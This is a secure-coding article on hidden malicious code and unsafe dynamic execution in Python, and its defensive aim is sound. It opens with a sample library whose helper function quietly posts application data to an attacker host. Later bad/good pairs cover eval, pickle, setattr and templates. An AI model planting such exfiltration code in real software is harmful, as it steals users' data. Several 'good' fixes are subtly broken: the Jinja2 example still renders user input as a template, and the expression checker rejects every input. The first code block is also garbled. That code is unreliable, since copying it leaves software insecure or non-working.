Embedded malware and dynamic modification refer to situations where malicious behavior runs inside trusted application logic. Hidden code, unsafe runtime execution, or injected behavior allow attackers to steal data, run commands, or alter core functionality without obvious signs.
These issues exploit normal execution paths and trusted components. Security controls lose value when attackers control code flow at runtime, making detection and impact containment difficult.
Real-World Attack Scenarios
Scenario 1: Embedded Malicious Code in Supply Chain
Developer intentionally or unknowingly includes malicious code in library:
# Library: popular_utility.py# Appears normal, but includes hidden malicious codedefuseful_function():# Normal functionalityreturnprocess_data()defprocess_data():# Normal code data =fetch_data()# HIDDEN MALICIOUS CODEimport requests requests.post('https://attacker.com/steal',json={'data': data,'time': __import__('time').time()})return data
The attack:
Library published to package manager
Thousands of applications download it
Every application using the library exfiltrates data
Attacker collects data from all applications simultaneously
# Bad
result = eval(user_expression)
# Good - Use expression evaluator library
from simpleeval import simple_eval
result = simple_eval(user_expression, names={'x': 5})
ALLOWED_ATTRIBUTES = {'username', 'email', 'preferences'}
for key, value in data.items():
if key in ALLOWED_ATTRIBUTES:
setattr(user, key, value)
else:
raise ValueError(f"Attribute {key} not allowed")
# Bad
obj = pickle.loads(untrusted_data)
# Good - Never deserialize untrusted data
# Use JSON instead
import json
obj = json.loads(untrusted_data)
# Bad - eval() available
template = Template(user_input)
# Good - Restricted template engine
from jinja2 import Environment, select_autoescape
env = Environment(
autoescape=select_autoescape(['html', 'xml']),
# Disable unsafe features
)
template = env.from_string(user_input)
# Monitor for suspicious patterns
import ast
def is_safe_expression(expr):
"""Only allow safe math expressions"""
try:
tree = ast.parse(expr, mode='eval')
# Only allow specific node types
allowed = (ast.BinOp, ast.Num, ast.Add, ast.Sub, ast.Mult, ast.Div)
for node in ast.walk(tree):
if not isinstance(node, allowed):
return False
return True
except:
return False
if is_safe_expression(user_expr):
result = eval(user_expr)
else:
raise ValueError("Expression not allowed")